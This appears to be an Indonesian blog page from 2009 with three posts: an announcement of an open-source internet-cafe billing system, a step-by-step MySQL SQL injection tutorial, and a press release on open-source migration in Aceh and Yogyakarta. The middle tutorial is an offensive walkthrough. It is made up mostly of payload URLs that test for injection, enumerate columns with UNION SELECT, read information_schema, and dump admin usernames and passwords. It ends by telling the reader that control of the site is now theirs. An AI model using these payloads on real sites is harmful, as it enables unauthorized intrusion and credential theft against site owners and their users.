Minggu, 25 Januari 2009

Billing Warnet Open Source

Ekonomi dan BisnisBaliwae baru saja merilis Billing Open Source (BiOS). BiOS Baliwae adalah billing yang diistimewakan untuk warnet berbasis Linux (meski dapat juga berjalan di hampir semua sistem operasi lainnya). Source code terbuka (open source), dan sepenuhnya FREE :). Dibuat dari scratch dan bukan turunan atau pengembangan dari aplikasi sejenis lainnya.



BiOS berbasis web - PHP dan MySQL dan berjalan diatas aplikasi webserver seperti Apache atau Monkey Server / Lighttpd, dsb. Menggunakan konsep Client - Server. Aplikasi Server dapat dipasang di proxy internet. Client dapat memantau durasi pemakaian dan biaya yang dikeluarkan via browser, seperti misalnya menggunakan aplikasi firefox dengan modifikasi otomatis (seperti pengaturan jendela dan sebagainya) oleh BiOS. BiOS telah menerapkan konsep AJAX dalam aplikasinya. Administrator dapat menetapkan aturan biaya koneksi per durasi waktu disampaing fitur sekuriti dsb. Sementara Operator dapat memonitor biaya yang harus dibayarkan client, memulai, menghentikan dan mereset billing client termasuk mencetak bill/nota untuk pelanggan. Demikian juga Client dapat memantau biaya yang sudah dihabiskannya.

Tidak ada kebutuhan khusus, karena semua aplikasi pendukung telah disertakan di kebanyakan distro mayor saat ini.

Agar optimal pastikan anda memiliki: client dan server linux (php + mysql + webserver) :D, browser firefox di client, untuk operator bisa menggunakan firefox atau juga konqueror dsb.

Versi development saat ini: BiOS versi Miracle 1.0

Download / lihat screenshotnya di: http://bios.baliwae.com/

My SQL Injection Oleh Kiddies code

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/ [dan lain sebagainya]

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...

migrasi komputer-komputer dengan OSS di DIY dan NAD

Pemerintah Propinsi Nanggroe Aceh Darussalam (NAD), Pemerintah Propinsi Daerah Istimewa Yogyakarta (DIY), Kementerian Negara Riset dan Teknologi serta Yayasan AirPutih, telah menyepakati untuk memigrasikan komputer-komputer yang dimilikinya ke perangkat lunak open sourse (PLOS). Proses migrasi ini akan dilaksanakan oleh Yayasan AirPutih bekerjasama dengan Jurusan Teknologi Informatika Universitas Gunadarma, Combine Resource Institution serta Yayasan Penggerak Linux Indonesia dan didukung oleh Kementerian Negara Riset dan Teknologi serta Hivos. Program ini sendiri bertajuk "Sosialisasi Open Source dan Pengembangan Helpdesk Nasional".

"Dalam jangka pendek, tujuan migrasi di dua propinsi ini adalah merumuskan masterplan migrasi open source," kata Imron Fauzi, Program Manager Open Source Yayasan AirPutih. "Dalam jangka panjang, propinsi yang sudah melakukan migrasi open source bisa mengurangi ketergantungan pada perangkat lunak yang mahal dan tertutup." Dalam program ini juga, setidaknya sebuah kantor milik pemerintah, sebuah lembaga swadaya masyarakat lokal yang bergerak di isu perempuan, sebuah institusi pendidikan serta sebuah kantor usaha kecil dan menengah juga akan dimigrasikan secara total. Migrasi meliputi instalasi perangkat lunak open source, training bagi pengguna dan penyusunan manual atau dokumentasinya.

Migrasi yang dilaksanakan, diawali dengan assesment untuk mengetahui jumlah komputer beserta spesifikasi dan penggunaannya di kantor-kantor pemerintah dalam wilayah sample. Wilayah sample di NAD meliputi Pemerintah Propinsi NAD, Pemerintah Kota Lhokseumawe, Pemerintah Kabupaten Aceh Jaya dan Pemerintah Kabupaten Aceh Tengah. Sedangkan di DIY meliputi Pemerintah propinsi Yogyakarta, Pemerintah Kota Yogyakarta, dan Pemerintah Kabupaten Gunung Kidul. Setelah data diperoleh, akan dikembangkan sebuah sistem operasi berbasis open source yang bisa menjawab kebutuhan. Dilengkapi dengan manual dan sistem pendukung lainnya, misalnya repository lokal serta persiapan layanan help desk secara online.

Sebagai langkah pertama, Yayasan AirPutih beserta partner-partnernya akan mengadakan sebuah diskusi di masing-masing propinsi. Diskusi ini bertujuan untuk menggalang masukan dan menyamakan persepsi mengenai open source. Dalam diskusi yang diselenggarakan pada 27 Agustus di NAD serta 4 September di DIY, direncanakan dihadiri oleh Menteri Negara Riset dan Teknologi, Kusmayanto Kadiman dan Gubernur masing-masing propinsi. Diskusi akan berlangsung terbuka dan diikuti oleh para wakil dari masing-masing wilayah yang akan di-migrasi serta elemen-elemen lain dalam bidang IT di setiap wilayah. Misalnya Kantor Pengelola Data Elektronik, Komunitas Pengguna Linux Indonesia dan sebagainya. Dalam diskusi itu, Rapin Murdiardjo dari ICT Watch akan memberikan materi mengenai Hak Atas Kekayaan Intelektual dan Lisensi PLOS. Sedangkan Rusmanto dari Yayasan Penggerak Linux Indonesia akan memaparkan mengenai Nilai Strategis Migrasi ke PLOS dan Standardisasi Dokumen. Diskusi akan ditutup dengan demo instalasi Linux secara mudah dan cermat serta klinik PLOS oleh Onno W. Purbo.

Langkah terakhir dalam rangkaian program yang akan berjalan selama dua tahun ini adalah pengembangan help desk open source nasional. Pengembangan help desk open source nasional, akan menjadi sebuah pusat rujukan semua kebutuhan PLOS. Mulai dari repository, klinik, forum, artikel, manual dan dokumentasi serta online support lainnya. I Made Wiryana, tokoh teknologi informasi Indonesia, menyatakan bahwa help desk nasional merupakan sebuah bagian tak terpisahkan dari strategi jangka panjang implementasi PLOS di Indonesia. I Made Wiryana yang juga Dewan Pengawas Yayasan AirPutih ini menambahkan, bahwa help desk asional PLOS ini nanti akan dikelola bersama oleh para pelaku PLOS secara kolaboratif.

Keseluruhan rangkaian program ini menganggarkan biaya sebesar 650 juta rupiah, yang bersumber dari Yayasan AirPutih, Hivos serta Kementerian Negara Riset dan Teknologi.

Daftar kontak:
Project Manager Open Source Yayasan AirPutih, Imron Fauzi, roim@airputih.or.id, 081574860710.
Dewan Pendiri Yayasan Penggerak Linux Indonesia, Rusmanto, rus@ypli.or.id, 08129204004.
Ketua Jurusan Teknik Informatika Universitas Gunadarma, Dr.-Ing. Adang Suhendra, SSi,SKom,MSc., adang@staff.gunadarma.ac.id, 08561086935.
Project Manager Open Source Combine Resource Institution, Akhmad Nasir, anasir@combine.or.id, 0811256850.
Programme Officer ICT/Media & HIV/AIDS Hivos, Shita Laksmi, s.laksmi@hivos.or.id
Asisten Deputi Urusan Pengembangan dan Pemanfaatan Teknologi Informasi, Deputi Bidang Pendayagunaan dan Pemasyarakatan Iptek pada Kementerian
Negara Riset dan Teknologi, Ir. Kemal Prihatman M. Eng, kemal@ristek.go.id, 0811142001.